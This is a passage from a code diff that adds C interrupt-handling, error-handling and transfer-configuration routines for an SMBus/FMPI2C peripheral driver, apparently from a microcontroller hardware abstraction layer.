FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_RX); + + /* Clear STOP Flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_STOPF); + + /* Clear Configuration Register 2 */ + FMPSMBUS_RESET_CR2(hfmpsmbus); + + hfmpsmbus->PreviousState = HAL_FMPSMBUS_STATE_READY; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->MasterRxCpltCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_MasterRxCpltCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + else + { + /* Nothing to do */ + } + } + else if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_RXNE) != RESET) + { + /* Read data from RXDR */ + *hfmpsmbus->pBuffPtr = (uint8_t)(hfmpsmbus->Instance->RXDR); + + /* Increment Buffer pointer */ + hfmpsmbus->pBuffPtr++; + + /* Increment Size counter */ + hfmpsmbus->XferSize--; + hfmpsmbus->XferCount--; + } + else if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_TXIS) != RESET) + { + /* Write data to TXDR */ + hfmpsmbus->Instance->TXDR = *hfmpsmbus->pBuffPtr; + + /* Increment Buffer pointer */ + hfmpsmbus->pBuffPtr++; + + /* Increment Size counter */ + hfmpsmbus->XferSize--; + hfmpsmbus->XferCount--; + } + else if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_TCR) != RESET) + { + if ((hfmpsmbus->XferCount != 0U) && (hfmpsmbus->XferSize == 0U)) + { + DevAddress = (uint16_t)(hfmpsmbus->Instance->CR2 & FMPI2C_CR2_SADD); + + if (hfmpsmbus->XferCount > MAX_NBYTE_SIZE) + { + FMPSMBUS_TransferConfig(hfmpsmbus, DevAddress, MAX_NBYTE_SIZE, + (FMPSMBUS_RELOAD_MODE | (hfmpsmbus->XferOptions & FMPSMBUS_SENDPEC_MODE)), + FMPSMBUS_NO_STARTSTOP); + hfmpsmbus->XferSize = MAX_NBYTE_SIZE; + } + else + { + hfmpsmbus->XferSize = hfmpsmbus->XferCount; + FMPSMBUS_TransferConfig(hfmpsmbus, DevAddress, (uint8_t)hfmpsmbus->XferSize, hfmpsmbus->XferOptions, + FMPSMBUS_NO_STARTSTOP); + /* If PEC mode is enable, size to transmit should be Size-1 byte, corresponding to PEC byte */ + /* PEC byte is automatically sent by HW block, no need to manage it in Transmit process */ + if (FMPSMBUS_GET_PEC_MODE(hfmpsmbus) != 0UL) + { + hfmpsmbus->XferSize--; + hfmpsmbus->XferCount--; + } + } + } + else if ((hfmpsmbus->XferCount == 0U) && (hfmpsmbus->XferSize == 0U)) + { + /* Call TxCpltCallback() if no stop mode is set */ + if (FMPSMBUS_GET_STOP_MODE(hfmpsmbus) != FMPSMBUS_AUTOEND_MODE) + { + /* Call the corresponding callback to inform upper layer of End of Transfer */ + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_MASTER_BUSY_TX) + { + /* Disable Interrupt */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_TX); + hfmpsmbus->PreviousState = hfmpsmbus->State; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->MasterTxCpltCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_MasterTxCpltCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + else if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_MASTER_BUSY_RX) + { + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_RX); + hfmpsmbus->PreviousState = hfmpsmbus->State; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->MasterRxCpltCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_MasterRxCpltCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + else + { + /* Nothing to do */ + } + } + } + else + { + /* Nothing to do */ + } + } + else if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_TC) != RESET) + { + if (hfmpsmbus->XferCount == 0U) + { + /* Specific use case for Quick command */ + if (hfmpsmbus->pBuffPtr == NULL) + { + /* Generate a Stop command */ + hfmpsmbus->Instance->CR2 |= FMPI2C_CR2_STOP; + } + /* Call TxCpltCallback() if no stop mode is set */ + else if (FMPSMBUS_GET_STOP_MODE(hfmpsmbus) != FMPSMBUS_AUTOEND_MODE) + { + /* No Generate Stop, to permit restart mode */ + /* The stop will be done at the end of transfer, when FMPSMBUS_AUTOEND_MODE enable */ + + /* Call the corresponding callback to inform upper layer of End of Transfer */ + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_MASTER_BUSY_TX) + { + /* Disable Interrupt */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_TX); + hfmpsmbus->PreviousState = hfmpsmbus->State; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->MasterTxCpltCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_MasterTxCpltCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + else if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_MASTER_BUSY_RX) + { + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_RX); + hfmpsmbus->PreviousState = hfmpsmbus->State; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->MasterRxCpltCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_MasterRxCpltCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + else + { + /* Nothing to do */ + } + } + else + { + /* Nothing to do */ + } + } + } + else + { + /* Nothing to do */ + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + return HAL_OK; +} +/** + * @brief Interrupt Sub-Routine which handle the Interrupt Flags Slave Mode. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param StatusFlags Value of Interrupt Flags. + * @retval HAL status + */ +static HAL_StatusTypeDef FMPSMBUS_Slave_ISR(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t StatusFlags) +{ + uint8_t TransferDirection; + uint16_t SlaveAddrCode; + + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_AF) != RESET) + { + /* Check that FMPSMBUS transfer finished */ + /* if yes, normal usecase, a NACK is sent by the HOST when Transfer is finished */ + /* Mean XferCount == 0*/ + /* So clear Flag NACKF only */ + if (hfmpsmbus->XferCount == 0U) + { + /* Clear NACK Flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_AF); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + } + else + { + /* if no, error usecase, a Non-Acknowledge of last Data is generated by the HOST*/ + /* Clear NACK Flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_AF); + + /* Set HAL State to "Idle" State, mean to LISTEN state */ + /* So reset Slave Busy state */ + hfmpsmbus->PreviousState = hfmpsmbus->State; + hfmpsmbus->State &= ~((uint32_t)HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX); + hfmpsmbus->State &= ~((uint32_t)HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX); + + /* Disable RX/TX Interrupts, keep only ADDR Interrupt */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_RX | FMPSMBUS_IT_TX); + + /* Set ErrorCode corresponding to a Non-Acknowledge */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_ACKF; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the Error callback to inform upper layer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->ErrorCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_ErrorCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + } + else if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_ADDR) != RESET) + { + TransferDirection = (uint8_t)(FMPSMBUS_GET_DIR(hfmpsmbus)); + SlaveAddrCode = (uint16_t)(FMPSMBUS_GET_ADDR_MATCH(hfmpsmbus)); + + /* Disable ADDR interrupt to prevent multiple ADDRInterrupt*/ + /* Other ADDRInterrupt will be treat in next Listen usecase */ + __HAL_FMPSMBUS_DISABLE_IT(hfmpsmbus, FMPSMBUS_IT_ADDRI); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call Slave Addr callback */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->AddrCallback(hfmpsmbus, TransferDirection, SlaveAddrCode); +#else + HAL_FMPSMBUS_AddrCallback(hfmpsmbus, TransferDirection, SlaveAddrCode); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + else if ((FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_RXNE) != RESET) || + (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_TCR) != RESET)) + { + if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX) == HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX) + { + /* Read data from RXDR */ + *hfmpsmbus->pBuffPtr = (uint8_t)(hfmpsmbus->Instance->RXDR); + + /* Increment Buffer pointer */ + hfmpsmbus->pBuffPtr++; + + hfmpsmbus->XferSize--; + hfmpsmbus->XferCount--; + + if (hfmpsmbus->XferCount == 1U) + { + /* Receive last Byte, can be PEC byte in case of PEC BYTE enabled */ + /* or only the last Byte of Transfer */ + /* So reset the RELOAD bit mode */ + hfmpsmbus->XferOptions &= ~FMPSMBUS_RELOAD_MODE; + FMPSMBUS_TransferConfig(hfmpsmbus, 0, 1, hfmpsmbus->XferOptions, FMPSMBUS_NO_STARTSTOP); + } + else if (hfmpsmbus->XferCount == 0U) + { + /* Last Byte is received, disable Interrupt */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_RX); + + /* Remove HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX, keep only HAL_FMPSMBUS_STATE_LISTEN */ + hfmpsmbus->PreviousState = hfmpsmbus->State; + hfmpsmbus->State &= ~((uint32_t)HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->SlaveRxCpltCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_SlaveRxCpltCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + else + { + /* Set Reload for next Bytes */ + FMPSMBUS_TransferConfig(hfmpsmbus, 0, 1, + FMPSMBUS_RELOAD_MODE | (hfmpsmbus->XferOptions & FMPSMBUS_SENDPEC_MODE), + FMPSMBUS_NO_STARTSTOP); + + /* Ack last Byte Read */ + hfmpsmbus->Instance->CR2 &= ~FMPI2C_CR2_NACK; + } + } + else if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX) == HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX) + { + if ((hfmpsmbus->XferCount != 0U) && (hfmpsmbus->XferSize == 0U)) + { + if (hfmpsmbus->XferCount > MAX_NBYTE_SIZE) + { + FMPSMBUS_TransferConfig(hfmpsmbus, 0, MAX_NBYTE_SIZE, + (FMPSMBUS_RELOAD_MODE | (hfmpsmbus->XferOptions & FMPSMBUS_SENDPEC_MODE)), + FMPSMBUS_NO_STARTSTOP); + hfmpsmbus->XferSize = MAX_NBYTE_SIZE; + } + else + { + hfmpsmbus->XferSize = hfmpsmbus->XferCount; + FMPSMBUS_TransferConfig(hfmpsmbus, 0, (uint8_t)hfmpsmbus->XferSize, hfmpsmbus->XferOptions, + FMPSMBUS_NO_STARTSTOP); + /* If PEC mode is enable, size to transmit should be Size-1 byte, corresponding to PEC byte */ + /* PEC byte is automatically sent by HW block, no need to manage it in Transmit process */ + if (FMPSMBUS_GET_PEC_MODE(hfmpsmbus) != 0UL) + { + hfmpsmbus->XferSize--; + hfmpsmbus->XferCount--; + } + } + } + } + else + { + /* Nothing to do */ + } + } + else if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_TXIS) != RESET) + { + /* Write data to TXDR only if XferCount not reach "0" */ + /* A TXIS flag can be set, during STOP treatment */ + /* Check if all Data have already been sent */ + /* If it is the case, this last write in TXDR is not sent, correspond to a dummy TXIS event */ + if (hfmpsmbus->XferCount > 0U) + { + /* Write data to TXDR */ + hfmpsmbus->Instance->TXDR = *hfmpsmbus->pBuffPtr; + + /* Increment Buffer pointer */ + hfmpsmbus->pBuffPtr++; + + hfmpsmbus->XferCount--; + hfmpsmbus->XferSize--; + } + + if (hfmpsmbus->XferCount == 0U) + { + /* Last Byte is Transmitted */ + /* Remove HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX, keep only HAL_FMPSMBUS_STATE_LISTEN */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_TX); + hfmpsmbus->PreviousState = hfmpsmbus->State; + hfmpsmbus->State &= ~((uint32_t)HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->SlaveTxCpltCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_SlaveTxCpltCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + } + else + { + /* Nothing to do */ + } + + /* Check if STOPF is set */ + if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_STOPF) != RESET) + { + if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_LISTEN) == HAL_FMPSMBUS_STATE_LISTEN) + { + /* Store Last receive data if any */ + if (__HAL_FMPSMBUS_GET_FLAG(hfmpsmbus, FMPSMBUS_FLAG_RXNE) != RESET) + { + /* Read data from RXDR */ + *hfmpsmbus->pBuffPtr = (uint8_t)(hfmpsmbus->Instance->RXDR); + + /* Increment Buffer pointer */ + hfmpsmbus->pBuffPtr++; + + if ((hfmpsmbus->XferSize > 0U)) + { + hfmpsmbus->XferSize--; + hfmpsmbus->XferCount--; + } + } + + /* Disable RX and TX Interrupts */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_RX | FMPSMBUS_IT_TX); + + /* Disable ADDR Interrupt */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_ADDR); + + /* Disable Address Acknowledge */ + hfmpsmbus->Instance->CR2 |= FMPI2C_CR2_NACK; + + /* Clear Configuration Register 2 */ + FMPSMBUS_RESET_CR2(hfmpsmbus); + + /* Clear STOP Flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_STOPF); + + /* Clear ADDR flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_ADDR); + + hfmpsmbus->XferOptions = 0; + hfmpsmbus->PreviousState = hfmpsmbus->State; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the Listen Complete callback, to inform upper layer of the end of Listen usecase */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->ListenCpltCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_ListenCpltCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + return HAL_OK; +} +/** + * @brief Manage the enabling of Interrupts. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param InterruptRequest Value of @ref FMPSMBUS_Interrupt_configuration_definition. + * @retval HAL status + */ +static void FMPSMBUS_Enable_IRQ(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t InterruptRequest) +{ + uint32_t tmpisr = 0UL; + + if ((InterruptRequest & FMPSMBUS_IT_ALERT) == FMPSMBUS_IT_ALERT) + { + /* Enable ERR interrupt */ + tmpisr |= FMPSMBUS_IT_ERRI; + } + + if ((InterruptRequest & FMPSMBUS_IT_ADDR) == FMPSMBUS_IT_ADDR) + { + /* Enable ADDR, STOP interrupt */ + tmpisr |= FMPSMBUS_IT_ADDRI | FMPSMBUS_IT_STOPI | FMPSMBUS_IT_NACKI | FMPSMBUS_IT_ERRI; + } + + if ((InterruptRequest & FMPSMBUS_IT_TX) == FMPSMBUS_IT_TX) + { + /* Enable ERR, TC, STOP, NACK, RXI interrupt */ + tmpisr |= FMPSMBUS_IT_ERRI | FMPSMBUS_IT_TCI | FMPSMBUS_IT_STOPI | FMPSMBUS_IT_NACKI | FMPSMBUS_IT_TXI; + } + + if ((InterruptRequest & FMPSMBUS_IT_RX) == FMPSMBUS_IT_RX) + { + /* Enable ERR, TC, STOP, NACK, TXI interrupt */ + tmpisr |= FMPSMBUS_IT_ERRI | FMPSMBUS_IT_TCI | FMPSMBUS_IT_STOPI | FMPSMBUS_IT_NACKI | FMPSMBUS_IT_RXI; + } + + /* Enable interrupts only at the end */ + /* to avoid the risk of FMPSMBUS interrupt handle execution before */ + /* all interrupts requested done */ + __HAL_FMPSMBUS_ENABLE_IT(hfmpsmbus, tmpisr); +} +/** + * @brief Manage the disabling of Interrupts. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param InterruptRequest Value of @ref FMPSMBUS_Interrupt_configuration_definition. + * @retval HAL status + */ +static void FMPSMBUS_Disable_IRQ(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t InterruptRequest) +{ + uint32_t tmpisr = 0UL; + uint32_t tmpstate = hfmpsmbus->State; + + if ((tmpstate == HAL_FMPSMBUS_STATE_READY) && ((InterruptRequest & FMPSMBUS_IT_ALERT) == FMPSMBUS_IT_ALERT)) + { + /* Disable ERR interrupt */ + tmpisr |= FMPSMBUS_IT_ERRI; + } + + if ((InterruptRequest & FMPSMBUS_IT_TX) == FMPSMBUS_IT_TX) + { + /* Disable TC, STOP, NACK and TXI interrupt */ + tmpisr |= FMPSMBUS_IT_TCI | FMPSMBUS_IT_TXI; + + if ((FMPSMBUS_GET_ALERT_ENABLED(hfmpsmbus) == 0UL) + && ((tmpstate & HAL_FMPSMBUS_STATE_LISTEN) != HAL_FMPSMBUS_STATE_LISTEN)) + { + /* Disable ERR interrupt */ + tmpisr |= FMPSMBUS_IT_ERRI; + } + + if ((tmpstate & HAL_FMPSMBUS_STATE_LISTEN) != HAL_FMPSMBUS_STATE_LISTEN) + { + /* Disable STOP and NACK interrupt */ + tmpisr |= FMPSMBUS_IT_STOPI | FMPSMBUS_IT_NACKI; + } + } + + if ((InterruptRequest & FMPSMBUS_IT_RX) == FMPSMBUS_IT_RX) + { + /* Disable TC, STOP, NACK and RXI interrupt */ + tmpisr |= FMPSMBUS_IT_TCI | FMPSMBUS_IT_RXI; + + if ((FMPSMBUS_GET_ALERT_ENABLED(hfmpsmbus) == 0UL) + && ((tmpstate & HAL_FMPSMBUS_STATE_LISTEN) != HAL_FMPSMBUS_STATE_LISTEN)) + { + /* Disable ERR interrupt */ + tmpisr |= FMPSMBUS_IT_ERRI; + } + + if ((tmpstate & HAL_FMPSMBUS_STATE_LISTEN) != HAL_FMPSMBUS_STATE_LISTEN) + { + /* Disable STOP and NACK interrupt */ + tmpisr |= FMPSMBUS_IT_STOPI | FMPSMBUS_IT_NACKI; + } + } + + if ((InterruptRequest & FMPSMBUS_IT_ADDR) == FMPSMBUS_IT_ADDR) + { + /* Disable ADDR, STOP and NACK interrupt */ + tmpisr |= FMPSMBUS_IT_ADDRI | FMPSMBUS_IT_STOPI | FMPSMBUS_IT_NACKI; + + if (FMPSMBUS_GET_ALERT_ENABLED(hfmpsmbus) == 0UL) + { + /* Disable ERR interrupt */ + tmpisr |= FMPSMBUS_IT_ERRI; + } + } + + /* Disable interrupts only at the end */ + /* to avoid a breaking situation like at "t" time */ + /* all disable interrupts request are not done */ + __HAL_FMPSMBUS_DISABLE_IT(hfmpsmbus, tmpisr); +} + +/** + * @brief FMPSMBUS interrupts error handler. + * @param hfmpsmbus FMPSMBUS handle. + * @retval None + */ +static void FMPSMBUS_ITErrorHandler(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + uint32_t itflags = READ_REG(hfmpsmbus->Instance->ISR); + uint32_t itsources = READ_REG(hfmpsmbus->Instance->CR1); + uint32_t tmpstate; + uint32_t tmperror; + + /* FMPSMBUS Bus error interrupt occurred ------------------------------------*/ + if (((itflags & FMPSMBUS_FLAG_BERR) == FMPSMBUS_FLAG_BERR) && \ + ((itsources & FMPSMBUS_IT_ERRI) == FMPSMBUS_IT_ERRI)) + { + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_BERR; + + /* Clear BERR flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_BERR); + } + + /* FMPSMBUS Over-Run/Under-Run interrupt occurred ----------------------------------------*/ + if (((itflags & FMPSMBUS_FLAG_OVR) == FMPSMBUS_FLAG_OVR) && \ + ((itsources & FMPSMBUS_IT_ERRI) == FMPSMBUS_IT_ERRI)) + { + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_OVR; + + /* Clear OVR flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_OVR); + } + + /* FMPSMBUS Arbitration Loss error interrupt occurred ------------------------------------*/ + if (((itflags & FMPSMBUS_FLAG_ARLO) == FMPSMBUS_FLAG_ARLO) && \ + ((itsources & FMPSMBUS_IT_ERRI) == FMPSMBUS_IT_ERRI)) + { + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_ARLO; + + /* Clear ARLO flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_ARLO); + } + + /* FMPSMBUS Timeout error interrupt occurred ---------------------------------------------*/ + if (((itflags & FMPSMBUS_FLAG_TIMEOUT) == FMPSMBUS_FLAG_TIMEOUT) && \ + ((itsources & FMPSMBUS_IT_ERRI) == FMPSMBUS_IT_ERRI)) + { + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_BUSTIMEOUT; + + /* Clear TIMEOUT flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_TIMEOUT); + } + + /* FMPSMBUS Alert error interrupt occurred -----------------------------------------------*/ + if (((itflags & FMPSMBUS_FLAG_ALERT) == FMPSMBUS_FLAG_ALERT) && \ + ((itsources & FMPSMBUS_IT_ERRI) == FMPSMBUS_IT_ERRI)) + { + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_ALERT; + + /* Clear ALERT flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_ALERT); + } + + /* FMPSMBUS Packet Error Check error interrupt occurred ----------------------------------*/ + if (((itflags & FMPSMBUS_FLAG_PECERR) == FMPSMBUS_FLAG_PECERR) && \ + ((itsources & FMPSMBUS_IT_ERRI) == FMPSMBUS_IT_ERRI)) + { + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_PECERR; + + /* Clear PEC error flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_PECERR); + } + + /* Store current volatile hfmpsmbus->State, misra rule */ + tmperror = hfmpsmbus->ErrorCode; + + /* Call the Error Callback in case of Error detected */ + if ((tmperror != HAL_FMPSMBUS_ERROR_NONE) && (tmperror != HAL_FMPSMBUS_ERROR_ACKF)) + { + /* Do not Reset the HAL state in case of ALERT error */ + if ((tmperror & HAL_FMPSMBUS_ERROR_ALERT) != HAL_FMPSMBUS_ERROR_ALERT) + { + /* Store current volatile hfmpsmbus->State, misra rule */ + tmpstate = hfmpsmbus->State; + + if (((tmpstate & HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX) == HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX) + || ((tmpstate & HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX) == HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX)) + { + /* Reset only HAL_FMPSMBUS_STATE_SLAVE_BUSY_XX */ + /* keep HAL_FMPSMBUS_STATE_LISTEN if set */ + hfmpsmbus->PreviousState = HAL_FMPSMBUS_STATE_READY; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_LISTEN; + } + } + + /* Call the Error callback to inform upper layer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->ErrorCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_ErrorCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } +} + +/** + * @brief Handle FMPSMBUS Communication Timeout. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param Flag Specifies the FMPSMBUS flag to check. + * @param Status The new Flag status (SET or RESET). + * @param Timeout Timeout duration + * @retval HAL status + */ +static HAL_StatusTypeDef FMPSMBUS_WaitOnFlagUntilTimeout(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t Flag, + FlagStatus Status, uint32_t Timeout) +{ + uint32_t tickstart = HAL_GetTick(); + + /* Wait until flag is set */ + while ((FlagStatus)(__HAL_FMPSMBUS_GET_FLAG(hfmpsmbus, Flag)) == Status) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0UL)) + { + hfmpsmbus->PreviousState = hfmpsmbus->State; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Update FMPSMBUS error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_HALTIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + return HAL_ERROR; + } + } + } + + return HAL_OK; +} + +/** + * @brief Handle FMPSMBUSx communication when starting transfer or during transfer (TC or TCR flag are set). + * @param hfmpsmbus FMPSMBUS handle. + * @param DevAddress specifies the slave address to be programmed. + * @param Size specifies the number of bytes to be programmed. + * This parameter must be a value between 0 and 255. + * @param Mode New state of the FMPSMBUS START condition generation. + * This parameter can be one or a combination of the following values: + * @arg @ref FMPSMBUS_RELOAD_MODE Enable Reload mode. + * @arg @ref FMPSMBUS_AUTOEND_MODE Enable Automatic end mode. + * @arg @ref FMPSMBUS_SOFTEND_MODE Enable Software end mode and Reload mode. + * @arg @ref FMPSMBUS_SENDPEC_MODE Enable Packet Error Calculation mode. + * @param Request New state of the FMPSMBUS START condition generation. + * This parameter can be one of the following values: + * @arg @ref FMPSMBUS_NO_STARTSTOP Don't Generate stop and start condition. + * @arg @ref FMPSMBUS_GENERATE_STOP Generate stop condition (Size should be set to 0). + * @arg @ref FMPSMBUS_GENERATE_START_READ Generate Restart for read request. + * @arg @ref FMPSMBUS_GENERATE_START_WRITE Generate Restart for write request. + * @retval None + */ +static void FMPSMBUS_TransferConfig(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint16_t DevAddress, uint8_t Size, + uint32_t Mode, uint32_t Request) +{ + /* Check the parameters */ + assert_param(IS_FMPSMBUS_ALL_INSTANCE(hfmpsmbus->Instance)); + assert_param(IS_FMPSMBUS_TRANSFER_MODE(Mode)); + assert_param(IS_FMPSMBUS_TRANSFER_REQUEST(Request)); + + /* update CR2 register */ + MODIFY_REG(hfmpsmbus->Instance->CR2, + ((FMPI2C_CR2_SADD | FMPI2C_CR2_NBYTES | FMPI2C_CR2_RELOAD | FMPI2C_CR2_AUTOEND | \ + (FMPI2C_CR2_RD_WRN & (uint32_t)(Request >> (31UL - 